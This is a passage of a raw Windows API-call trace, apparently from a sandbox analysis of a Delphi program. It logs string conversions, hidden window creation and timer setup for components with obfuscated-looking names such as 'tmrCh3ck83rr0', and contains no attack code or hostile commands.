3 [0281.692] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0281.692] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=6, lpWideCharStr=0x6351680, cchWideChar=6 | out: lpWideCharStr="TTimer") returned 6 [0281.692] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0281.692] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=11, lpWideCharStr=0x6360268, cchWideChar=11 | out: lpWideCharStr="tmrP3g48P4ger") returned 11 [0281.692] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60d99c5, cbMultiByte=6, lpWideCharStr=0x634a29c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0281.692] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TTimer", cchCount2=6) returned 2 [0281.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f581, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¢4\x06çF}wÜ¢4\x06\x88½+", lpUsedDefaultChar=0x0) returned 0 [0281.692] GetClassInfoW (in: hInstance=0x5fc0000, lpClassName="TPUtilWindow", lpWndClass=0x534f680 | out: lpWndClass=0x534f680) returned 1 [0281.692] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x5fc0000, lpParam=0x0) returned 0x1012c [0281.693] SetWindowLongW (hWnd=0x1012c, nIndex=-4, dwNewLong=54660882) returned 100465804 [0281.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0281.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrP3g48P4g", cchWideChar=11, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrP3g48P4g", lpUsedDefaultChar=0x0) returned 11 [0281.693] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0281.693] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=7, lpWideCharStr=0x634a298, cchWideChar=7 | out: lpWideCharStr="Enabledr") returned 7 [0281.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Enabled", cchWideChar=7, lpMultiByteStr=0x636026c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Enabled", lpUsedDefaultChar=0x0) returned 7 [0281.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="False", cchWideChar=5, lpMultiByteStr=0x634a39c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="False", lpUsedDefaultChar=0x0) returned 5 [0281.693] KillTimer (hWnd=0x1012c, uIDEvent=0x1) returned 0 [0281.693] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0281.693] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=7, lpWideCharStr=0x634a378, cchWideChar=7 | out: lpWideCharStr="OnTimered") returned 7 [0281.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnTimer", cchWideChar=7, lpMultiByteStr=0x636026c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnTimer", lpUsedDefaultChar=0x0) returned 7 [0281.693] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a298, cbMultiByte=16, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0281.693] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a298, cbMultiByte=16, lpWideCharStr=0x6366d88, cchWideChar=16 | out: lpWideCharStr="tmrP3g48P4gTimerer晰ضҰ\x02\x01") returned 16 [0281.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrP3g48P4gTimer", cchWideChar=16, lpMultiByteStr=0x534f4e5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrP3g48P4gTimer", lpUsedDefaultChar=0x0) returned 16 [0281.693] KillTimer (hWnd=0x1012c, uIDEvent=0x1) returned 0 [0281.693] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0281.693] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=4, lpWideCharStr=0x6351668, cchWideChar=4 | out: lpWideCharStr="Left㑐g\x01") returned 4 [0281.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x634a37c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeftT", lpUsedDefaultChar=0x0) returned 4 [0281.694] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0281.694] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=3, lpWideCharStr=0x6351668, cchWideChar=3 | out: lpWideCharStr="Topt㑐g\x01") returned 3 [0281.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x634a31c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0281.694] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0281.694] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=6, lpWideCharStr=0x6351668, cchWideChar=6 | out: lpWideCharStr="TTimerೠص\x02") returned 6 [0281.694] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a318, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0281.694] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a318, cbMultiByte=13, lpWideCharStr=0x6360268, cchWideChar=13 | out: lpWideCharStr="tmrCh3ck83rr0") returned 13 [0281.694] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60d99c5, cbMultiByte=6, lpWideCharStr=0x634a31c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0281.694] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TTimer", cchCount2=6) returned 2 [0281.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f581, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¢4\x06çF}wÜ¢4\x06\x88½+", lpUsedDefaultChar=0x0) returned 0 [0281.694] GetClassInfoW (in: hInstance=0x5fc0000, lpClassName="TPUtilWindow", lpWndClass=0x534f680 | out: lpWndClass=0x534f680) returned 1 [0281.694] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x5fc0000, lpParam=0x0) returned 0x1012e [0281.694] SetWindowLongW (hWnd=0x1012e, nIndex=-4, dwNewLong=54660869) returned 100465804 [0281.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0281.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrCh3ck83rr0", cchWideChar=13, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrCh3ck83rr0", lpUsedDefaultChar=0x0) returned 13 [0281.695] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0281.695] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=7, lpWideCharStr=0x634a318, cchWideChar=7 | out: lpWideCharStr="Enabledr") returned 7 [0281.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Enabled", cchWideChar=7, lpMultiByteStr=0x636026c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Enabled", lpUsedDefaultChar=0x0) returned 7 [0281.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="False", cchWideChar=5, lpMultiByteStr=0x634a39c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="False", lpUsedDefaultChar=0x0) returned 5 [0281.695] KillTimer (hWnd=0x1012e, uIDEvent=0x1) returned 0 [0281.695] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0281.695] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=8, lpWideCharStr=0x634a298, cchWideChar=8 | out: lpWideCharStr="Intervald") returned 8 [0281.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Interval", cchWideChar=8, lpMultiByteStr=0x6366e4c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Interval", lpUsedDefaultChar=0x0) returned 8 [0281.695] KillTimer (hWnd=0x1012e, uIDEvent=0x1) returned 0 [0281.695] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0281.695] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=7, lpWideCharStr=0x634a318, cchWideChar=7 | out: lpWideCharStr="OnTimered") returned 7 [0281.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnTimer", cchWideChar=7, lpMultiByteStr=0x6360294, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnTimer", lpUsedDefaultChar=0x0) returned 7 [0281.695] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a378, cbMultiByte=18, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18 [0281.695] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a378, cbMultiByte=18, lpWideCharStr=0x6366e48, cchWideChar=18 | out: lpWideCharStr="tmrCh3ck83rr0Timer") returned 18 [0281.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrCh3ck83rr0Timer", cchWideChar=18, lpMultiByteStr=0x534f4e5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrCh3ck83rr0Timer", lpUsedDefaultChar=0x0) returned 18 [0281.695] KillTimer (hWnd=0x1012e, uIDEvent=0x1) returned 0 [0281.695] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0281.695] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=4, lpWideCharStr=0x6351680, cchWideChar=4 | out: lpWideCharStr="Leftp") returned 4 [0281.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x634a31c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeftT", lpUsedDefaultChar=0x0) returned 4 [0281.696] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0281.696] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=3, lpWideCharStr=0x6351680, cchWideChar=3 | out: lpWideCharStr="Toptp") returned 3 [0281.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x634a29c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0281.696] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0281.696] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=6, lpWideCharStr=0x6351680, cchWideChar=6 | out: lpWideCharStr="TTimer") returned 6 [0281.696] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=10, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0281.696] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=10, lpWideCharStr=0x634a298, cchWideChar=10 | out: lpWideCharStr="tmrMB08st4馰ش朐؈") returned 10 [0281.696] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60d99c5, cbMultiByte=6, lpWideCharStr=0x634a29c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0281.696] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TTimer", cchCount2=6) returned 2 [0281.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f581, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¢4\x06çF}wÜ¢4\x06\x88½+", lpUsedDefaultChar=0x0) returned 0 [0281.696] GetClassInfoW (in: hInstance=0x5fc0000, lpClassName="TPUtilWindow", lpWndClass=0x534f680 | out: lpWndClass=0x534f680) returned 1 [0281.696] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x5fc0000, lpParam=0x0) returned 0x10130 [0281.696] SetWindowLongW (hWnd=0x10130, nIndex=-4, dwNewLong=54660856) returned 100465804 [0281.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0281.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrMB08st4", cchWideChar=10, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrMB08st4", lpUsedDefaultChar=0x0) returned 10 [0281.697] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0281.697] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=7, lpWideCharStr=0x634a298, cchWideChar=7 | out: lpWideCharStr="Enabledr") returned 7 [0281.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Enabled", cchWideChar=7, lpMultiByteStr=0x636026c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Enabled", lpUsedDefaultChar=0x0) returned 7 [0281.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="False", cchWideChar=5, lpMultiByteStr=0x634a39c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="False", lpUsedDefaultChar=0x0) returned 5 [0281.697] KillTimer (hWnd=0x10130, uIDEvent=0x1) returned 0 [0281.697] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0281.697] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=7, lpWideCharStr=0x634a378, cchWideChar=7 | out: lpWideCharStr="OnTimered") returned 7 [0281.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnTimer", cchWideChar=7, lpMultiByteStr=0x636026c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnTimer", lpUsedDefaultChar=0x0) returned 7 [0281.697] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a298, cbMultiByte=15, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 15 [0281.697] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a298, cbMultiByte=15, lpWideCharStr=0x6366e48, cchWideChar=15 | out: lpWideCharStr="tmrMB08st4Timermer") returned 15 [0281.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrMB08st4Timer", cchWideChar=15, lpMultiByteStr=0x534f4e5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrMB08st4Timer\x0f", lpUsedDefaultChar=0x0) returned 15 [0281.697] KillTimer (hWnd=0x10130, uIDEvent=0x1) returned 0 [0281.697] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0281.697] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=4, lpWideCharStr=0x6351668, cchWideChar=4 | out: lpWideCharStr="Left㑴") returned 4 [0281.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x634a37c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeftT", lpUsedDefaultChar=0x0) returned 4 [0281.697] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0281.697] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=3, lpWideCharStr=0x6351668, cchWideChar=3 | out: lpWideCharStr="Topt㑴") returned 3 [0281.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x634a31c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0281.698] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0281.698] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=6, lpWideCharStr=0x6351668, cchWideChar=6 | out: lpWideCharStr="TTimerೠص\x02") returned 6 [0281.698] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0281.698] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=7, lpWideCharStr=0x634a318, cchWideChar=7 | out: lpWideCharStr="tmrMU8Per") returned 7 [0281.698] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60d99c5, cbMultiByte=6, lpWideCharStr=0x634a31c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0281.698] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TTimer", cchCount2=6) returned 2 [0281.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f581, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¢4\x06çF}wÜ¢4\x06\x88½+", lpUsedDefaultChar=0x0) returned 0 [0281.698] GetClassInfoW (in: hInstance=0x5fc0000, lpClassName="TPUtilWindow", lpWndClass=0x534f680 | out: lpWndClass=0x534f680) returned 1 [0281.698] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x5fc0000, lpParam=0x0) returned 0x10132 [0281.699] SetWindowLongW (hWnd=0x10132, nIndex=-4, dwNewLong=54660843) returned 100465804 [0281.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0281.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrMU8P", cchWideChar=7, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrMU8P", lpUsedDefaultChar=0x0) returned 7 [0281.699] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0281.699] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=8, lpWideCharStr=0x634a318, cchWideChar=8 | out: lpWideCharStr="Interval") returned 8 [0281.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Interval", cchWideChar=8, lpMultiByteStr=0x6366e7c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IntervalB", lpUsedDefaultChar=0x0) returned 8 [0281.699] KillTimer (hWnd=0x10132, uIDEvent=0x1) returned 0 [0281.699] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0281.699] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=7, lpWideCharStr=0x634a318, cchWideChar=7 | out: lpWideCharStr="OnTimerl") returned 7 [0281.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnTimer", cchWideChar=7, lpMultiByteStr=0x63602bc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnTimer", lpUsedDefaultChar=0x0) returned 7 [0281.699] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=12, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0281.700] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=12, lpWideCharStr=0x63602b8, cchWideChar=12 | out: lpWideCharStr="tmrMU8PTimer") returned 12 [0281.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrMU8PTimer", cchWideChar=12, lpMultiByteStr=0x534f4e5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrMU8PTimer", lpUsedDefaultChar=0x0) returned 12 [0281.700] KillTimer (hWnd=0x10132, uIDEvent=0x1) returned 0 [0281.700] SetTimer (hWnd=0x10132, nIDEvent=0x1, uElapse=0xea60, lpTimerFunc=0x0) returned 0x1 [0281.700] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0281.700] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=4, lpWideCharStr=0x6351680, cchWideChar=4 | out: lpWideCharStr="Left浩牥") returned 4 [0281.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x634a31c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeftT", lpUsedDefaultChar=0x0) returned 4 [0281.700] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0281.700] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=3, lpWideCharStr=0x6351680, cchWideChar=3 | out: lpWideCharStr="Topt浩牥") returned 3 [0281.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x634a37c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0281.700] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0281.700] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x61da33d, cbMultiByte=10, lpWideCharStr=0x635fe84, cchWideChar=11 | out: lpWideCharStr="TFrmMwM41n") returned 10 [0281.700] GetWindowLongW (hWnd=0x10110, nIndex=-20) returned 384 [0281.700] SetWindowLongW (hWnd=0x10110, nIndex=-20, dwNewLong=256) returned 384 [0281.700] DefWindowProcW (hWnd=0x10110, Msg=0x7c, wParam=0xffffffec, lParam=0x534f56c) returned 0x0 [0281.700] DefWindowProcW (hWnd=0x10110, Msg=0x7d, wParam=0xffffffec, lParam=0x534f56c) returned 0x0 [0281.701] DefWindowProcW (hWnd=0x10110, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x1013b [0281.701] GetClassInfoW (in: 